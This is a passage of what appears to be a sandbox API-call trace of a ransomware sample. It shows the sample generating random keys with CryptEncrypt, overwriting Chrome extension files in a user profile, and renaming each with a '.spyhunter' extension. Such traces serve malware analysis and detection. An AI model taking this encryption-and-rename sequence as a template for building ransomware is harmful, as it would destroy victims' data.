pbData=0x31f020*, pdwDataLen=0x248f628*=0x30) returned 1 [0135.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0135.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0135.858] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.858] GetProcessHeap () returned 0x2c0000 [0135.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.858] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5ec*=0x10b, lpOverlapped=0x0) returned 1 [0136.031] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffef5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.031] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5ec*=0x10b, lpOverlapped=0x0) returned 1 [0136.031] GetProcessHeap () returned 0x2c0000 [0136.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.031] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.031] WriteFile (in: hFile=0x188, lpBuffer=0x248f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x248f62c*, lpNumberOfBytesWritten=0x248f5ec*=0x4, lpOverlapped=0x0) returned 1 [0136.032] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5ec*=0x30, lpOverlapped=0x0) returned 1 [0136.032] CloseHandle (hObject=0x188) returned 1 [0136.032] GetProcessHeap () returned 0x2c0000 [0136.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0136.032] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 169 [0136.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0136.033] GetProcessHeap () returned 0x2c0000 [0136.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0136.033] GetProcessHeap () returned 0x2c0000 [0136.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.033] GetProcessHeap () returned 0x2c0000 [0136.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80f88 | out: hHeap=0x2c0000) returned 1 [0136.033] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f628 | out: pbBuffer=0x248f628) returned 1 [0136.033] GetProcessHeap () returned 0x2c0000 [0136.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.033] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f620*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f620*=0x30) returned 1 [0136.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0136.034] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0136.034] GetProcessHeap () returned 0x2c0000 [0136.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.034] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5e4*=0x1a33, lpOverlapped=0x0) returned 1 [0136.127] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffe5cd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.127] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1a33, lpNumberOfBytesWritten=0x248f5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5e4*=0x1a33, lpOverlapped=0x0) returned 1 [0136.127] GetProcessHeap () returned 0x2c0000 [0136.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.127] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.127] WriteFile (in: hFile=0x188, lpBuffer=0x248f624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5e4, lpOverlapped=0x0 | out: lpBuffer=0x248f624*, lpNumberOfBytesWritten=0x248f5e4*=0x4, lpOverlapped=0x0) returned 1 [0136.127] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5e4*=0x30, lpOverlapped=0x0) returned 1 [0136.128] CloseHandle (hObject=0x188) returned 1 [0136.128] GetProcessHeap () returned 0x2c0000 [0136.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.128] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.spyhunter") returned 148 [0136.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.spyhunter")) returned 1 [0136.129] GetProcessHeap () returned 0x2c0000 [0136.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.129] GetProcessHeap () returned 0x2c0000 [0136.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.129] GetProcessHeap () returned 0x2c0000 [0136.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7040 | out: hHeap=0x2c0000) returned 1 [0136.130] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f620 | out: pbBuffer=0x248f620) returned 1 [0136.130] GetProcessHeap () returned 0x2c0000 [0136.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.131] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f618*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f618*=0x30) returned 1 [0136.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0136.131] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.131] GetProcessHeap () returned 0x2c0000 [0136.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.131] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5dc*=0xdf, lpOverlapped=0x0) returned 1 [0136.132] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.132] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x248f5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5dc*=0xdf, lpOverlapped=0x0) returned 1 [0136.132] GetProcessHeap () returned 0x2c0000 [0136.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.132] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.132] WriteFile (in: hFile=0x188, lpBuffer=0x248f61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5dc, lpOverlapped=0x0 | out: lpBuffer=0x248f61c*, lpNumberOfBytesWritten=0x248f5dc*=0x4, lpOverlapped=0x0) returned 1 [0136.133] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5dc*=0x30, lpOverlapped=0x0) returned 1 [0136.133] CloseHandle (hObject=0x188) returned 1 [0136.133] GetProcessHeap () returned 0x2c0000 [0136.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.133] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.spyhunter") returned 166 [0136.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0136.133] GetProcessHeap () returned 0x2c0000 [0136.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.133] GetProcessHeap () returned 0x2c0000 [0136.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.133] GetProcessHeap () returned 0x2c0000 [0136.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81730 | out: hHeap=0x2c0000) returned 1 [0136.135] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f618 | out: pbBuffer=0x248f618) returned 1 [0136.135] GetProcessHeap () returned 0x2c0000 [0136.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.135] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f610*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f610*=0x30) returned 1 [0136.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.135] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0136.135] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.135] GetProcessHeap () returned 0x2c0000 [0136.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.135] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5d4*=0xdc, lpOverlapped=0x0) returned 1 [0136.136] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.136] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x248f5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5d4*=0xdc, lpOverlapped=0x0) returned 1 [0136.136] GetProcessHeap () returned 0x2c0000 [0136.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.136] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.136] WriteFile (in: hFile=0x188, lpBuffer=0x248f614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5d4, lpOverlapped=0x0 | out: lpBuffer=0x248f614*, lpNumberOfBytesWritten=0x248f5d4*=0x4, lpOverlapped=0x0) returned 1 [0136.137] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5d4*=0x30, lpOverlapped=0x0) returned 1 [0136.137] CloseHandle (hObject=0x188) returned 1 [0136.137] GetProcessHeap () returned 0x2c0000 [0136.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.137] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.spyhunter") returned 165 [0136.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0136.137] GetProcessHeap () returned 0x2c0000 [0136.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.138] GetProcessHeap () returned 0x2c0000 [0136.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.138] GetProcessHeap () returned 0x2c0000 [0136.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81420 | out: hHeap=0x2c0000) returned 1 [0136.139] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f610 | out: pbBuffer=0x248f610) returned 1 [0136.139] GetProcessHeap () returned 0x2c0000 [0136.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.139] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f608*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f608*=0x30) returned 1 [0136.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0136.139] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.139] GetProcessHeap () returned 0x2c0000 [0136.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.139] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5cc*=0xe2, lpOverlapped=0x0) returned 1 [0136.140] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.140] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x248f5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f5cc*=0xe2, lpOverlapped=0x0) returned 1 [0136.140] GetProcessHeap () returned 0x2c0000 [0136.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.141] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.141] WriteFile (in: hFile=0x188, lpBuffer=0x248f60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5cc, lpOverlapped=0x0 | out: lpBuffer=0x248f60c*, lpNumberOfBytesWritten=0x248f5cc*=0x4, lpOverlapped=0x0) returned 1 [0136.141] WriteFile (in: hFile=0x188, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5cc*=0x30, lpOverlapped=0x0) returned 1 [0136.141] CloseHandle (hObject=0x188) returned 1 [0136.141] GetProcessHeap () returned 0x2c0000 [0136.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.141] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.spyhunter") returned 165 [0136.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0136.142] GetProcessHeap () returned 0x2c0000 [0136.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.142] GetProcessHeap () returned 0x2c0000 [0136.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0136.142] GetProcessHeap () returned 0x2c0000 [0136.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81110 | out: hHeap=0x2c0000) returned 1 [0136.143] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f608 | out: pbBuffer=0x248f608) returned 1 [0136.143] GetProcessHeap () returned 0x2c0000 [0136.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0136.144] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f600*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f600*=0x30) returned 1 [0136.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0136.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0136.144] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.144] GetProcessHeap () returned 0x2c0000 [0136.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.144] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f5c4*=0xe5, lpOverlapped=0x0) returned 1 [0136.145] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.145] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x248f5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, 